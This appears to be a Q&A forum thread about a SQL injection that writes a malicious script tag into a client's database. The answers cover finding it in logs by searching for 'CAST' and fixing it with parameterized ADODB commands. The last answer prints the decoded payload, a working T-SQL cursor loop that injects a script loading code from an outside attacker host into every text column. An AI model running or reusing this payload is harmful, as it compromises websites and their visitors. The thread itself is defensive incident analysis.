# Searching Logs for SQL Injection

Tags: sql-injection

it appears there is a `<script src="http://xinthesidersdown.com">` being injected into a clients server and I've checked the logs to see where and how it has been injected. Unfortunately when i search for `xinthesidersdown` to see if it was injected, I don't see it showing any results.  Does anyone have any suggestions to find out how the invader is getting in and injecting this code into the database?  Thank you.

Answer (score 2, accepted):

Look for the word "CAST" in your log entries...

Comment: Found it searching for `CAST` thank you.

Answer (score 2):

I have the same problem.

We allready had several database injections before - but were able to stop them thanks to replacing the normal opening recordsets with ADODB Command executions:

Example:

**Before:**

```
szSQL = "SELECT ...."
adoRstM.CursorLocation = adUseClient
adoRstM.CursorType = adOpenStatic
adoRstM.LockType = adLockBatchOptimistic
adoRstM.Open szSQL, adoCon
```

**Now**

```
Set objCommand = Server.CreateObject("ADODB.COMMAND")
Set objCommand.ActiveConnection = adoCon
objCommand.CommandText = szSQL
objCommand.CommandType = adCmdText
Set param1 = objCommand.CreateParameter ("nMenu", adInteger, adParamInput)
param1.value = Cint(nMenu)
objCommand.Parameters.Append param1
Set param1 = objCommand.CreateParameter ("nSubMenu", adInteger, adParamInput)
param1.value = Cint(nSubMenu)
objCommand.Parameters.Append param1
Set adoRstM = objCommand.Execute()
```

But we had to replace it everywhere !

I m now checking our website - if we might have missed one.
Maybe this helps you ...

Answer (score 2):

To elaborate on Einav's answer (I work with her), the injection payload is obfuscated by using the CAST function to convert a hex-format payload into an actual malicious query string, which then gets executed by an SQL exec command. The generic injection format can be seen
[here](http://brakertech.com/decoding-sql-injection-attempts/).

The specific payload in this case translated to:

```
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://xinthesidersdown.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
```

Hope that helps.